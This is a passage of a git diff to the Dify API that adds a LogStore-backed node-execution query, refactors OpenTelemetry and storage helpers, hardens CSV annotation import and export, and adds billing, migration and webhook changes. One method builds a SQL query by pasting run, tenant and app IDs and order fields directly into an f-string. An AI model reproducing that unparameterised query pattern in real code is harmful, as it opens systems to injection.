since we always write + complete records. We append a new record with updated data fields. 
+ + Args: + execution: The NodeExecution instance with data to save + """ + logger.debug("save_execution_data: id=%s, node_execution_id=%s", execution.id, execution.node_execution_id) + # In LogStore, we simply write a new complete record with the data + # The log_version timestamp will ensure this is treated as the latest version + self.save(execution) + + def get_by_workflow_run( + self, + workflow_run_id: str, + order_config: OrderConfig | None = None, + ) -> Sequence[WorkflowNodeExecution]: + """ + Retrieve all NodeExecution instances for a specific workflow run. + Uses LogStore SQL query with finished_at IS NOT NULL filter for deduplication. + This ensures we only get the final version of each node execution. + Args: + workflow_run_id: The workflow run ID + order_config: Optional configuration for ordering results + order_config.order_by: List of fields to order by (e.g., ["index", "created_at"]) + order_config.order_direction: Direction to order ("asc" or "desc") + + Returns: + A list of NodeExecution instances + + Note: + This method filters by finished_at IS NOT NULL to avoid duplicates from + version updates. For complete history including intermediate states, + a different query strategy would be needed. 
+ """ + logger.debug("get_by_workflow_run: workflow_run_id=%s, order_config=%s", workflow_run_id, order_config) + # Build SQL query with deduplication using finished_at IS NOT NULL + # This optimization avoids window functions for common case where we only + # want the final state of each node execution + + # Build ORDER BY clause + order_clause = "" + if order_config and order_config.order_by: + order_fields = [] + for field in order_config.order_by: + # Map domain field names to logstore field names if needed + field_name = field + if order_config.order_direction == "desc": + order_fields.append(f"{field_name} DESC") + else: + order_fields.append(f"{field_name} ASC") + if order_fields: + order_clause = "ORDER BY " + ", ".join(order_fields) + + sql = f""" + SELECT * + FROM {AliyunLogStore.workflow_node_execution_logstore} + WHERE workflow_run_id='{workflow_run_id}' + AND tenant_id='{self._tenant_id}' + AND finished_at IS NOT NULL + """ + + if self._app_id: + sql += f" AND app_id='{self._app_id}'" + + if order_clause: + sql += f" {order_clause}" + + try: + # Execute SQL query + results = self.logstore_client.execute_sql( + sql=sql, + query="*", + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + + # Convert LogStore results to WorkflowNodeExecution domain models + executions = [] + for row in results: + try: + execution = _dict_to_workflow_node_execution(row) + executions.append(execution) + except Exception as e: + logger.warning("Failed to convert row to WorkflowNodeExecution: %s, row=%s", e, row) + continue + + return executions + + except Exception: + logger.exception("Failed to retrieve node executions from LogStore: workflow_run_id=%s", workflow_run_id) + raise diff --git a/api/extensions/otel/decorators/base.py b/api/extensions/otel/decorators/base.py index 9604a3b6d5..14221d24dd 100644 --- a/api/extensions/otel/decorators/base.py +++ b/api/extensions/otel/decorators/base.py @@ -1,5 +1,4 @@ import functools -import os from collections.abc 
import Callable from typing import Any, TypeVar, cast @@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer from configs import dify_config from extensions.otel.decorators.handler import SpanHandler +from extensions.otel.runtime import is_instrument_flag_enabled T = TypeVar("T", bound=Callable[..., Any]) _HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()} -def _is_instrument_flag_enabled() -> bool: - """ - Check if external instrumentation is enabled via environment variable. - - Third-party non-invasive instrumentation agents set this flag to coordinate - with Dify's manual OpenTelemetry instrumentation. - """ - return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" - - def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler: """Get or create a singleton instance of the handler class.""" if handler_class not in _HANDLER_INSTANCES: @@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T], def decorator(func: T) -> T: @functools.wraps(func) def wrapper(*args: Any, **kwargs: Any) -> Any: - if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()): + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): return func(*args, **kwargs) handler = _get_handler_instance(handler_class or SpanHandler) diff --git a/api/extensions/otel/runtime.py b/api/extensions/otel/runtime.py index 16f5ccf488..a7181d2683 100644 --- a/api/extensions/otel/runtime.py +++ b/api/extensions/otel/runtime.py @@ -1,4 +1,5 @@ import logging +import os import sys from typing import Union @@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs): if dify_config.DEBUG: logger.info("Initializing OpenTelemetry for Celery worker") CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument() + + +def is_instrument_flag_enabled() -> bool: + """ + Check if external instrumentation is enabled via environment variable. 
+ + Third-party non-invasive instrumentation agents set this flag to coordinate + with Dify's manual OpenTelemetry instrumentation. + """ + return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" diff --git a/api/extensions/storage/opendal_storage.py b/api/extensions/storage/opendal_storage.py index a084844d72..83c5c2d12f 100644 --- a/api/extensions/storage/opendal_storage.py +++ b/api/extensions/storage/opendal_storage.py @@ -87,15 +87,16 @@ class OpenDALStorage(BaseStorage): if not self.exists(path): raise FileNotFoundError("Path not found") - all_files = self.op.scan(path=path) + # Use the new OpenDAL 0.46.0+ API with recursive listing + lister = self.op.list(path, recursive=True) if files and directories: logger.debug("files and directories on %s scanned", path) - return [f.path for f in all_files] + return [entry.path for entry in lister] if files: logger.debug("files on %s scanned", path) - return [f.path for f in all_files if not f.path.endswith("/")] + return [entry.path for entry in lister if not entry.metadata.is_dir] elif directories: logger.debug("directories on %s scanned", path) - return [f.path for f in all_files if f.path.endswith("/")] + return [entry.path for entry in lister if entry.metadata.is_dir] else: raise ValueError("At least one of files or directories must be True") diff --git a/api/factories/file_factory.py b/api/factories/file_factory.py index 737a79f2b0..bd71f18af2 100644 --- a/api/factories/file_factory.py +++ b/api/factories/file_factory.py @@ -1,3 +1,4 @@ +import logging import mimetypes import os import re @@ -17,6 +18,8 @@ from core.helper import ssrf_proxy from extensions.ext_database import db from models import MessageFile, ToolFile, UploadFile +logger = logging.getLogger(__name__) + def build_from_message_files( *, @@ -356,15 +359,20 @@ def _build_from_tool_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + # Backward/interop compatibility: allow tool_file_id to 
come from related_id or URL + tool_file_id = mapping.get("tool_file_id") + + if not tool_file_id: + raise ValueError(f"ToolFile {tool_file_id} not found") tool_file = db.session.scalar( select(ToolFile).where( - ToolFile.id == mapping.get("tool_file_id"), + ToolFile.id == tool_file_id, ToolFile.tenant_id == tenant_id, ) ) if tool_file is None: - raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found") + raise ValueError(f"ToolFile {tool_file_id} not found") extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin" @@ -402,10 +410,13 @@ def _build_from_datasource_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + datasource_file_id = mapping.get("datasource_file_id") + if not datasource_file_id: + raise ValueError(f"DatasourceFile {datasource_file_id} not found") datasource_file = ( db.session.query(UploadFile) .where( - UploadFile.id == mapping.get("datasource_file_id"), + UploadFile.id == datasource_file_id, UploadFile.tenant_id == tenant_id, ) .first() diff --git a/api/libs/encryption.py b/api/libs/encryption.py new file mode 100644 index 0000000000..81be8cce97 --- /dev/null +++ b/api/libs/encryption.py @@ -0,0 +1,66 @@ +""" +Field Encoding/Decoding Utilities + +Provides Base64 decoding for sensitive fields (password, verification code) +received from the frontend. + +Note: This uses Base64 encoding for obfuscation, not cryptographic encryption. +Real security relies on HTTPS for transport layer encryption. +""" + +import base64 +import logging + +logger = logging.getLogger(__name__) + + +class FieldEncryption: + """Handle decoding of sensitive fields during transmission""" + + @classmethod + def decrypt_field(cls, encoded_text: str) -> str | None: + """ + Decode Base64 encoded field from frontend. 
+ + Args: + encoded_text: Base64 encoded text from frontend + + Returns: + Decoded plaintext, or None if decoding fails + """ + try: + # Decode base64 + decoded_bytes = base64.b64decode(encoded_text) + decoded_text = decoded_bytes.decode("utf-8") + logger.debug("Field decoding successful") + return decoded_text + + except Exception: + # Decoding failed - return None to trigger error in caller + return None + + @classmethod + def decrypt_password(cls, encrypted_password: str) -> str | None: + """ + Decrypt password field + + Args: + encrypted_password: Encrypted password from frontend + + Returns: + Decrypted password or None if decryption fails + """ + return cls.decrypt_field(encrypted_password) + + @classmethod + def decrypt_verification_code(cls, encrypted_code: str) -> str | None: + """ + Decrypt verification code field + + Args: + encrypted_code: Encrypted code from frontend + + Returns: + Decrypted code or None if decryption fails + """ + return cls.decrypt_field(encrypted_code) diff --git a/api/libs/helper.py b/api/libs/helper.py index a278ace6ad..74e1808e49 100644 --- a/api/libs/helper.py +++ b/api/libs/helper.py @@ -11,6 +11,7 @@ from collections.abc import Generator, Mapping from datetime import datetime from hashlib import sha256 from typing import TYPE_CHECKING, Annotated, Any, Optional, Union, cast +from uuid import UUID from zoneinfo import available_timezones from flask import Response, stream_with_context @@ -119,6 +120,19 @@ def uuid_value(value: Any) -> str: raise ValueError(error) +def normalize_uuid(value: str | UUID) -> str: + if not value: + return "" + + try: + return uuid_value(value) + except ValueError as exc: + raise ValueError("must be a valid UUID") from exc + + +UUIDStrOrEmpty = Annotated[str, AfterValidator(normalize_uuid)] + + def alphanumeric(value: str): # check if the value is alphanumeric and underlined if re.match(r"^[a-zA-Z0-9_]+$", value): @@ -184,7 +198,7 @@ def timezone(timezone_string): def convert_datetime_to_date(field, 
target_timezone: str = ":tz"): if dify_config.DB_TYPE == "postgresql": return f"DATE(DATE_TRUNC('day', {field} AT TIME ZONE 'UTC' AT TIME ZONE {target_timezone}))" - elif dify_config.DB_TYPE == "mysql": + elif dify_config.DB_TYPE in ["mysql", "oceanbase", "seekdb"]: return f"DATE(CONVERT_TZ({field}, 'UTC', {target_timezone}))" else: raise NotImplementedError(f"Unsupported database type: {dify_config.DB_TYPE}") @@ -215,7 +229,11 @@ def generate_text_hash(text: str) -> str: def compact_generate_response(response: Union[Mapping, Generator, RateLimitGenerator]) -> Response: if isinstance(response, dict): - return Response(response=json.dumps(jsonable_encoder(response)), status=200, mimetype="application/json") + return Response( + response=json.dumps(jsonable_encoder(response)), + status=200, + content_type="application/json; charset=utf-8", + ) else: def generate() -> Generator: diff --git a/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py new file mode 100644 index 0000000000..2bdd430e81 --- /dev/null +++ b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py @@ -0,0 +1,31 @@ +"""add type column not null default tool + +Revision ID: 03ea244985ce +Revises: d57accd375ae +Create Date: 2025-12-16 18:17:12.193877 + +""" +from alembic import op +import models as models +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision = '03ea244985ce' +down_revision = 'd57accd375ae' +branch_labels = None +depends_on = None + + +def upgrade(): + # ### commands auto generated by Alembic - please adjust! 
### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.add_column(sa.Column('type', sa.String(length=50), server_default=sa.text("'tool'"), nullable=False)) + # ### end Alembic commands ### + + +def downgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.drop_column('type') + # ### end Alembic commands ### diff --git a/api/models/dataset.py b/api/models/dataset.py index ba2eaf6749..445ac6086f 100644 --- a/api/models/dataset.py +++ b/api/models/dataset.py @@ -1532,6 +1532,7 @@ class PipelineRecommendedPlugin(TypeBase): ) plugin_id: Mapped[str] = mapped_column(LongText, nullable=False) provider_name: Mapped[str] = mapped_column(LongText, nullable=False) + type: Mapped[str] = mapped_column(sa.String(50), nullable=False, server_default=sa.text("'tool'")) position: Mapped[int] = mapped_column(sa.Integer, nullable=False, default=0) active: Mapped[bool] = mapped_column(sa.Boolean, nullable=False, default=True) created_at: Mapped[datetime] = mapped_column( diff --git a/api/models/model.py b/api/models/model.py index c8fbdc40ec..88cb945b3f 100644 --- a/api/models/model.py +++ b/api/models/model.py @@ -111,7 +111,11 @@ class App(Base): else: app_model_config = self.app_model_config if app_model_config: - return app_model_config.pre_prompt + pre_prompt = app_model_config.pre_prompt or "" + # Truncate to 200 characters with ellipsis if using prompt as description + if len(pre_prompt) > 200: + return pre_prompt[:200] + "..." 
+ return pre_prompt else: return "" diff --git a/api/pyproject.toml b/api/pyproject.toml index 2a8432f571..870de33f4b 100644 --- a/api/pyproject.toml +++ b/api/pyproject.toml @@ -1,9 +1,10 @@ [project] name = "dify-api" -version = "1.11.0" +version = "1.11.1" requires-python = ">=3.11,<3.13" dependencies = [ + "aliyun-log-python-sdk~=0.9.37", "arize-phoenix-otel~=0.9.2", "azure-identity==1.16.1", "beautifulsoup4==4.12.2", @@ -31,6 +32,7 @@ dependencies = [ "httpx[socks]~=0.27.0", "jieba==0.42.1", "json-repair>=0.41.1", + "jsonschema>=4.25.1", "langfuse~=2.51.3", "langsmith~=0.1.77", "markdown~=3.5.1", @@ -91,7 +93,6 @@ dependencies = [ "weaviate-client==4.17.0", "apscheduler>=3.11.0", "weave>=0.52.16", - "jsonschema>=4.25.1", ] # Before adding new dependency, consider place it in # alphabet order (a-z) and suitable group. @@ -216,6 +217,7 @@ vdb = [ "pymochow==2.2.9", "pyobvector~=0.2.17", "qdrant-client==1.9.0", + "intersystems-irispython>=5.1.0", "tablestore==6.3.7", "tcvectordb~=1.6.4", "tidb-vector==0.0.9", diff --git a/api/pytest.ini b/api/pytest.ini index afb53b47cc..4a9470fa0c 100644 --- a/api/pytest.ini +++ b/api/pytest.ini @@ -1,5 +1,5 @@ [pytest] -addopts = --cov=./api --cov-report=json --cov-report=xml +addopts = --cov=./api --cov-report=json env = ANTHROPIC_API_KEY = sk-ant-api11-IamNotARealKeyJustForMockTestKawaiiiiiiiiii-NotBaka-ASkksz AZURE_OPENAI_API_BASE = https://difyai-openai.openai.azure.com diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py index 9258def907..d03cbddceb 100644 --- a/api/services/annotation_service.py +++ b/api/services/annotation_service.py @@ -1,10 +1,14 @@ +import logging import uuid import pandas as pd + +logger = logging.getLogger(__name__) from sqlalchemy import or_, select from werkzeug.datastructures import FileStorage from werkzeug.exceptions import NotFound +from core.helper.csv_sanitizer import CSVSanitizer from extensions.ext_database import db from extensions.ext_redis import 
redis_client from libs.datetime_utils import naive_utc_now @@ -155,6 +159,12 @@ class AppAnnotationService: @classmethod def export_annotation_list_by_app_id(cls, app_id: str): + """ + Export all annotations for an app with CSV injection protection. + + Sanitizes question and content fields to prevent formula injection attacks + when exported to CSV format. + """ # get app info _, current_tenant_id = current_account_with_tenant() app = ( @@ -171,6 +181,16 @@ class AppAnnotationService: .order_by(MessageAnnotation.created_at.desc()) .all() ) + + # Sanitize CSV-injectable fields to prevent formula injection + for annotation in annotations: + # Sanitize question field if present + if annotation.question: + annotation.question = CSVSanitizer.sanitize_value(annotation.question) + # Sanitize content field (answer) + if annotation.content: + annotation.content = CSVSanitizer.sanitize_value(annotation.content) + return annotations @classmethod @@ -330,6 +350,18 @@ class AppAnnotationService: @classmethod def batch_import_app_annotations(cls, app_id, file: FileStorage): + """ + Batch import annotations from CSV file with enhanced security checks. 
+ + Security features: + - File size validation + - Row count limits (min/max) + - Memory-efficient CSV parsing + - Subscription quota validation + - Concurrency tracking + """ + from configs import dify_config + # get app info current_user, current_tenant_id = current_account_with_tenant() app = ( @@ -341,16 +373,80 @@ class AppAnnotationService: if not app: raise NotFound("App not found") + job_id: str | None = None # Initialize to avoid unbound variable error try: - # Skip the first row - df = pd.read_csv(file.stream, dtype=str) - result = [] - for _, row in df.iterrows(): - content = {"question": row.iloc[0], "answer": row.iloc[1]} + # Quick row count check before full parsing (memory efficient) + # Read only first chunk to estimate row count + file.stream.seek(0) + first_chunk = file.stream.read(8192) # Read first 8KB + file.stream.seek(0) + + # Estimate row count from first chunk + newline_count = first_chunk.count(b"\n") + if newline_count == 0: + raise ValueError("The CSV file appears to be empty or invalid.") + + # Parse CSV with row limit to prevent memory exhaustion + # Use chunksize for memory-efficient processing + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS + + # Read CSV in chunks to avoid loading entire file into memory + df = pd.read_csv( + file.stream, + dtype=str, + nrows=max_records + 1, # Read one extra to detect overflow + engine="python", + on_bad_lines="skip", # Skip malformed lines instead of crashing + ) + + # Validate column count + if len(df.columns) < 2: + raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).") + + # Build result list with validation + result: list[dict] = [] + for idx, row in df.iterrows(): + # Stop if we exceed the limit + if len(result) >= max_records: + raise ValueError( + f"The CSV file contains too many records. Maximum {max_records} records allowed per import. 
" + f"Please split your file into smaller batches." + ) + + # Extract and validate question and answer + try: + question_raw = row.iloc[0] + answer_raw = row.iloc[1] + except (IndexError, KeyError): + continue # Skip malformed rows + + # Convert to string and strip whitespace + question = str(question_raw).strip() if question_raw is not None else "" + answer = str(answer_raw).strip() if answer_raw is not None else "" + + # Skip empty entries or NaN values + if not question or not answer or question.lower() == "nan" or answer.lower() == "nan": + continue + + # Validate length constraints (idx is pandas index, convert to int for display) + row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2 + if len(question) > 2000: + raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.") + if len(answer) > 10000: + raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.") + + content = {"question": question, "answer": answer} result.append(content) - if len(result) == 0: - raise ValueError("The CSV file is empty.") - # check annotation limit + + # Validate minimum records + if len(result) < min_records: + raise ValueError( + f"The CSV file must contain at least {min_records} valid annotation record(s). " + f"Found {len(result)} valid record(s)." 
+ ) + + # Check annotation quota limit features = FeatureService.get_features(current_tenant_id) if features.billing.enabled: annotation_quota_limit = features.annotation_quota_limit @@ -359,12 +455,34 @@ class AppAnnotationService: # async job job_id = str(uuid.uuid4()) indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" - # send batch add segments task + + # Register job in active tasks list for concurrency tracking + current_time = int(naive_utc_now().timestamp() * 1000) + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zadd(active_jobs_key, {job_id: current_time}) + redis_client.expire(active_jobs_key, 7200) # 2 hours TTL + + # Set job status redis_client.setnx(indexing_cache_key, "waiting") batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id) - except Exception as e: + + except ValueError as e: return {"error_msg": str(e)} - return {"job_id": job_id, "job_status": "waiting"} + except Exception as e: + # Clean up active job registration on error (only if job was created) + if job_id is not None: + try: + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zrem(active_jobs_key, job_id) + except Exception: + # Silently ignore cleanup errors - the job will be auto-expired + logger.debug("Failed to clean up active job tracking during error handling") + + # Check if it's a CSV parsing error + error_str = str(e) + return {"error_msg": f"An error occurred while processing the file: {error_str}"} + + return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)} @classmethod def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit): diff --git a/api/services/billing_service.py b/api/services/billing_service.py index 54e1c9d285..3d7cb6cc8d 100644 --- a/api/services/billing_service.py +++ b/api/services/billing_service.py @@ -1,8 +1,12 @@ +import logging import os +from collections.abc import Sequence from 
typing import Literal import httpx +from pydantic import TypeAdapter from tenacity import retry, retry_if_exception_type, stop_before_delay, wait_fixed +from typing_extensions import TypedDict from werkzeug.exceptions import InternalServerError from enums.cloud_plan import CloudPlan @@ -11,6 +15,15 @@ from extensions.ext_redis import redis_client from libs.helper import RateLimiter from models import Account, TenantAccountJoin, TenantAccountRole +logger = logging.getLogger(__name__) + + +class SubscriptionPlan(TypedDict): + """Tenant subscriptionplan information.""" + + plan: str + expiration_date: int + class BillingService: base_url = os.environ.get("BILLING_API_URL", "BILLING_API_URL") @@ -239,3 +252,39 @@ class BillingService: def sync_partner_tenants_bindings(cls, account_id: str, partner_key: str, click_id: str): payload = {"account_id": account_id, "click_id": click_id} return cls._send_request("PUT", f"/partners/{partner_key}/tenants", json=payload) + + @classmethod + def get_plan_bulk(cls, tenant_ids: Sequence[str]) -> dict[str, SubscriptionPlan]: + """ + Bulk fetch billing subscription plan via billing API. 
+ Payload: {"tenant_ids": ["t1", "t2", ...]} (max 200 per request) + Returns: + Mapping of tenant_id -> {plan: str, expiration_date: int} + """ + results: dict[str, SubscriptionPlan] = {} + subscription_adapter = TypeAdapter(SubscriptionPlan) + + chunk_size = 200 + for i in range(0, len(tenant_ids), chunk_size): + chunk = tenant_ids[i : i + chunk_size] + try: + resp = cls._send_request("POST", "/subscription/plan/batch", json={"tenant_ids": chunk}) + data = resp.get("data", {}) + + for tenant_id, plan in data.items(): + subscription_plan = subscription_adapter.validate_python(plan) + results[tenant_id] = subscription_plan + except Exception: + logger.exception("Failed to fetch billing info batch for tenants: %s", chunk) + continue + + return results + + @classmethod + def get_expired_subscription_cleanup_whitelist(cls) -> Sequence[str]: + resp = cls._send_request("GET", "/subscription/cleanup/whitelist") + data = resp.get("data", []) + tenant_whitelist = [] + for item in data: + tenant_whitelist.append(item["tenant_id"]) + return tenant_whitelist diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py index 7841b8b33d..970192fde5 100644 --- a/api/services/dataset_service.py +++ b/api/services/dataset_service.py @@ -1419,7 +1419,7 @@ class DocumentService: document.name = name db.session.add(document) - if document.data_source_info_dict: + if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict: db.session.query(UploadFile).where( UploadFile.id == document.data_source_info_dict["upload_file_id"] ).update({UploadFile.name: name}) @@ -1636,6 +1636,20 @@ class DocumentService: return [], "" db.session.add(dataset_process_rule) db.session.flush() + else: + # Fallback when no process_rule provided in knowledge_config: + # 1) reuse dataset.latest_process_rule if present + # 2) otherwise create an automatic rule + dataset_process_rule = getattr(dataset, "latest_process_rule", None) + if not dataset_process_rule: + 
dataset_process_rule = DatasetProcessRule( + dataset_id=dataset.id, + mode="automatic", + rules=json.dumps(DatasetProcessRule.AUTOMATIC_RULES), + created_by=account.id, + ) + db.session.add(dataset_process_rule) + db.session.flush() lock_name = f"add_document_lock_dataset_id_{dataset.id}" try: with redis_client.lock(lock_name, timeout=600): @@ -1647,65 +1661,67 @@ class DocumentService: if not knowledge_config.data_source.info_list.file_info_list: raise ValueError("File source info is required") upload_file_list = knowledge_config.data_source.info_list.file_info_list.file_ids - for file_id in upload_file_list: - file = ( - db.session.query(UploadFile) - .where(UploadFile.tenant_id == dataset.tenant_id, UploadFile.id == file_id) - .first() + files = ( + db.session.query(UploadFile) + .where( + UploadFile.tenant_id == dataset.tenant_id, + UploadFile.id.in_(upload_file_list), ) + .all() + ) + if len(files) != len(set(upload_file_list)): + raise FileNotExistsError("One or more files not found.") - # raise error if file not found - if not file: - raise FileNotExistsError() - - file_name = file.name + file_names = [file.name for file in files] + db_documents = ( + db.session.query(Document) + .where( + Document.dataset_id == dataset.id, + Document.tenant_id == current_user.current_tenant_id, + Document.data_source_type == "upload_file", + Document.enabled == True, + Document.name.in_(file_names), + ) + .all() + ) + documents_map = {document.name: document for document in db_documents} + for file in files: data_source_info: dict[str, str | bool] = { - "upload_file_id": file_id, + "upload_file_id": file.id, } - # check duplicate - if knowledge_config.duplicate: - document = ( - db.session.query(Document) - .filter_by( - dataset_id=dataset.id, - tenant_id=current_user.current_tenant_id, - data_source_type="upload_file", - enabled=True, - name=file_name, - ) - .first() + document = documents_map.get(file.name) + if knowledge_config.duplicate and document: + 
document.dataset_process_rule_id = dataset_process_rule.id + document.updated_at = naive_utc_now() + document.created_from = created_from + document.doc_form = knowledge_config.doc_form + document.doc_language = knowledge_config.doc_language + document.data_source_info = json.dumps(data_source_info) + document.batch = batch + document.indexing_status = "waiting" + db.session.add(document) + documents.append(document) + duplicate_document_ids.append(document.id) + continue + else: + document = DocumentService.build_document( + dataset, + dataset_process_rule.id, + knowledge_config.data_source.info_list.data_source_type, + knowledge_config.doc_form, + knowledge_config.doc_language, + data_source_info, + created_from, + position, + account, + file.name, + batch, ) - if document: - document.dataset_process_rule_id = dataset_process_rule.id - document.updated_at = naive_utc_now() - document.created_from = created_from - document.doc_form = knowledge_config.doc_form - document.doc_language = knowledge_config.doc_language - document.data_source_info = json.dumps(data_source_info) - document.batch = batch - document.indexing_status = "waiting" - db.session.add(document) - documents.append(document) - duplicate_document_ids.append(document.id) - continue - document = DocumentService.build_document( - dataset, - dataset_process_rule.id, - knowledge_config.data_source.info_list.data_source_type, - knowledge_config.doc_form, - knowledge_config.doc_language, - data_source_info, - created_from, - position, - account, - file_name, - batch, - ) - db.session.add(document) - db.session.flush() - document_ids.append(document.id) - documents.append(document) - position += 1 + db.session.add(document) + db.session.flush() + document_ids.append(document.id) + documents.append(document) + position += 1 elif knowledge_config.data_source.info_list.data_source_type == "notion_import": notion_info_list = knowledge_config.data_source.info_list.notion_info_list # type: ignore if not 
notion_info_list: @@ -2801,20 +2817,20 @@ class SegmentService: db.session.add(binding) db.session.commit() - # save vector index - try: - VectorService.create_segments_vector( - [args["keywords"]], [segment_document], dataset, document.doc_form - ) - except Exception as e: - logger.exception("create segment index failed") - segment_document.enabled = False - segment_document.disabled_at = naive_utc_now() - segment_document.status = "error" - segment_document.error = str(e) - db.session.commit() - segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() - return segment + # save vector index + try: + keywords = args.get("keywords") + keywords_list = [keywords] if keywords is not None else None + VectorService.create_segments_vector(keywords_list, [segment_document], dataset, document.doc_form) + except Exception as e: + logger.exception("create segment index failed") + segment_document.enabled = False + segment_document.disabled_at = naive_utc_now() + segment_document.status = "error" + segment_document.error = str(e) + db.session.commit() + segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() + return segment except LockNotOwnedError: pass diff --git a/api/services/entities/knowledge_entities/rag_pipeline_entities.py b/api/services/entities/knowledge_entities/rag_pipeline_entities.py index a97ccab914..cbb0efcc2a 100644 --- a/api/services/entities/knowledge_entities/rag_pipeline_entities.py +++ b/api/services/entities/knowledge_entities/rag_pipeline_entities.py @@ -23,7 +23,7 @@ class RagPipelineDatasetCreateEntity(BaseModel): description: str icon_info: IconInfo permission: str - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None yaml_content: str | None = None diff --git a/api/services/hit_testing_service.py b/api/services/hit_testing_service.py index 8e8e78f83f..8cbf3a25c3 100644 --- a/api/services/hit_testing_service.py 
+++ b/api/services/hit_testing_service.py @@ -178,8 +178,8 @@ class HitTestingService: @classmethod def hit_testing_args_check(cls, args): - query = args["query"] - attachment_ids = args["attachment_ids"] + query = args.get("query") + attachment_ids = args.get("attachment_ids") if not attachment_ids and not query: raise ValueError("Query or attachment_ids is required") diff --git a/api/services/rag_pipeline/rag_pipeline.py b/api/services/rag_pipeline/rag_pipeline.py index 097d16e2a7..f53448e7fe 100644 --- a/api/services/rag_pipeline/rag_pipeline.py +++ b/api/services/rag_pipeline/rag_pipeline.py @@ -1248,14 +1248,13 @@ class RagPipelineService: session.commit() return workflow_node_execution_db_model - def get_recommended_plugins(self) -> dict: + def get_recommended_plugins(self, type: str) -> dict: # Query active recommended plugins - pipeline_recommended_plugins = ( - db.session.query(PipelineRecommendedPlugin) - .where(PipelineRecommendedPlugin.active == True) - .order_by(PipelineRecommendedPlugin.position.asc()) - .all() - ) + query = db.session.query(PipelineRecommendedPlugin).where(PipelineRecommendedPlugin.active == True) + if type and type != "all": + query = query.where(PipelineRecommendedPlugin.type == type) + + pipeline_recommended_plugins = query.order_by(PipelineRecommendedPlugin.position.asc()).all() if not pipeline_recommended_plugins: return { diff --git a/api/services/trigger/webhook_service.py b/api/services/trigger/webhook_service.py index 4b3e1330fd..5c4607d400 100644 --- a/api/services/trigger/webhook_service.py +++ b/api/services/trigger/webhook_service.py @@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError from services.trigger.app_trigger_service import AppTriggerService from services.workflow.entities import WebhookTriggerData +try: + import magic +except ImportError: + magic = None # type: ignore[assignment] + logger = logging.getLogger(__name__) @@ -317,7 +322,8 @@ class WebhookService: try: file_content = 
request.get_data() if file_content: - file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger) + mimetype = cls._detect_binary_mimetype(file_content) + file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger) return {"raw": file_obj.to_dict()}, {} else: return {"raw": None}, {} @@ -341,6 +347,18 @@ class WebhookService: body = {"raw": ""} return body, {} + @staticmethod + def _detect_binary_mimetype(file_content: bytes) -> str: + """Guess MIME type for binary payloads using python-magic when available.""" + if magic is not None: + try: + detected = magic.from_buffer(file_content[:1024], mime=True) + if detected: + return detected + except Exception: + logger.debug("python-magic detection failed for octet-stream payload") + return "application/octet-stream" + @classmethod def _process_file_uploads( cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger diff --git a/api/services/variable_truncator.py b/api/services/variable_truncator.py index 6eb8d0031d..0f969207cf 100644 --- a/api/services/variable_truncator.py +++ b/api/services/variable_truncator.py @@ -410,9 +410,12 @@ class VariableTruncator(BaseTruncator): @overload def _truncate_json_primitives(self, val: None, target_size: int) -> _PartResult[None]: ... + @overload + def _truncate_json_primitives(self, val: File, target_size: int) -> _PartResult[File]: ... 
